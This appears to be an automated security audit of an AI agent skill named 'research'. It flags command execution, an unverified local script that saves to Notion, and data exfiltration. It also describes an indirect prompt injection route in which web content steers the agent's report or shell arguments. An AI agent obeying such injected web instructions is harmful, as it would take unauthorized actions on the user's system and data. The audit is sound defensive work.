research
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONDATA_EXFILTRATION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill instructions mandate the execution of shell commands, specifically
pythonto run a script andrmto delete a temporary file. This grants the agent the ability to execute code on the host system based on hardcoded paths.- REMOTE_CODE_EXECUTION (HIGH): The skill relies on an unverified external script located atC:\Users\atxin\.claude\skills\notion-save-skill\scripts\save_to_notion.py. Executing local scripts that are not part of the core skill package or a trusted source is a high-risk behavior.- DATA_EXFILTRATION (MEDIUM): The skill is designed to transmit potentially sensitive research data to an external service (Notion) using an API key environment variable.- INDIRECT PROMPT INJECTION (HIGH): The skill is required to browse the internet for 'latest data and news'. Because the agent has file-writing and command-execution capabilities, malicious content on external websites could attempt to inject instructions to manipulate the report content or the arguments passed to the shell commands (e.g., via the--titleparameter), leading to unauthorized actions.
Recommendations
- AI detected serious security threats
Audit Metadata